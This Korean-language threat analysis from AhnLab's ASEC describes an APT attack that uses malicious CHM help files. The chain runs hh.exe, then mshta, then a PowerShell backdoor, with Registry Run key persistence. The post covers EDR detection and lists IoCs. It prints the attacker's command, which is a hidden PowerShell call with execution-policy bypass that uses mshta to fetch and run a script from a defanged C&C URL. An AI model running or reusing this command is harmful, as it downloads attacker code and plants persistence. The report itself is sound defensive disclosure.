AhnLab Security Emergency response Center(ASEC)은 최근 CHM(Compiled HTML Help File)을 이용한 APT 공격 사례를 공개하였다.

CHM은 HTML 형식의 도움말 파일이며 HTML 파일을 내부에 포함하므로 공격자는 악의적인 스크립트 코드를 HTML에 삽입할 수 있다. 삽입된 스크립트는 운영체제 기본 응용 프로그램인 hh.exe를 통해 실행된다. 이처럼 공격자가 서명되어 있거나 운영체제에 기본으로 설치된 프로그램을 통해 악성코드를 실행하는 기법을 MITRE ATT&CK에서는 T1218 (System Binary Proxy Execution)이라 명명하였다. MITRE에서는 공격자가 T1218 기법을 이용하여 악성코드를 실행할 경우 서명된 바이너리 혹은 MS 기본 프로그램에서 악성코드가 실행되기 때문에 프로세스 및 시그니처 기반의 탐지를 쉽게 우회할 수 있다고 소개하고 있다.

이번에 ASEC에서 확인한 CHM 악성코드는 mshta.exe를 통해 파워쉘을 실행하는 악성 스크립트([그림 2])를 공격자 서버로부터 다운로드 받아 실행한다.

[그림 2]에서 최종적으로 실행되는 파워쉘 스크립트는 공격자 C&C 서버로부터 명령 수행 및 지속성 유지를 위한 레지스트리 Run키에 명령어를 등록한다.
레지스트리 Run키 등록 명령어 (지속성 유지) |
c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html |
아래 [그림 3]은 안랩 EDR(Endpoint Detection and Response) 제품에서 보여지는 이메일의 첨부 파일 형태로 실행된 CHM 위협의 프로세스 트리 정보이다.

안랩 EDR 제품에서는 CHM 유형의 악성코드 위협에 대해 행위 정보 기록과 탐지를 하고 있다. 따라서 EDR 운영 담당자는 EDR 이력 검색을 통해 사내 인프라에 CHM 유형 악성코드 관련 위협이 있는지 확인할 수 있다.
- CHM 위협 기록 확인 방법 : 이벤트 -> EDR 행위 -> 기간 설정 -> EDR 위협 검색 (hh.exe)

다음은 안랩 EDR 분석 화면에서 확인할 수 있는 CHM 관련 위협 정보이다.
[MITRE ATT&CK 정보]


이번에 확인된 CHM 악성코드 위협은 최종적으로 파워쉘 형태의 백도어가 실행되고 지속성 유지를 위한 자동 실행 레지스트리 Run키 등록 행위를 수행한다. EDR 운영 담당자는 EDR을 통해서 [그림 5]와 같이 공격자 C&C 서버 주소 정보와 [그림 6]의 자동 실행 레지스트리 Run키 등록 정보를 확인하여 위협을 제거할 수 있다.
또한 EDR 콘솔의 [분석] – [위협] 탭에서 탐지된 위협에 대해 [그림 7]과 같이 “대응하기” 버튼을 눌러 조치를 할 수 있다. 해당 기능은 프로세스에 대한 조치를 취할 수 있는 기능으로써 프로세스 종료 뿐만 아니라 파일 수집 기능을 지원한다. 그리고 침해를 당한 호스트 PC에 대해서도 EDR에서는 [그림 8]과 같이 네트워크 격리 조치 기능을 지원하여 내부 확산(Lateral Movement) 및 공격자 명령 수행 등 추가 피해를 예방할 수 있다.


안랩 V3, EDR 제품에서는 CHM 위협에 대해 아래 진단명으로 탐지하고 있다.
[파일 진단]
Trojan/CHM.Agent (2023.03.08.03)
Backdoor/Powershell.Generic.SC187227 (2023.03.21.00)
[행위 진단]
SystemManipulation/EDR.AutoRun.M3833
Execution/EDR.Mshta.M10996
[IoC]
[CHM]
809528921de39530de59e3793d74af98
[PowerShell]
32445d05dd1348bce9b6a395b2f8fbd8
[C&C]
hxxp://shacc[.]kr/skin/product/1.html
CHM 위협 관련 MITRE ATT&CK 매핑은 다음과 같다.
– T1218.001 System Binary Proxy Execution: Compiled HTML File
– T1547 Boot or Logon Autostart Execution
행위 정보 탐지 및 분석을 통한 엔드포인트 가시성을 제공하고 위협을 능동적으로 추적하는 AhnLab EDR에 대한 자세한 정보는 안랩닷컴에서 확인이 가능하다.
Categories:안랩 탐지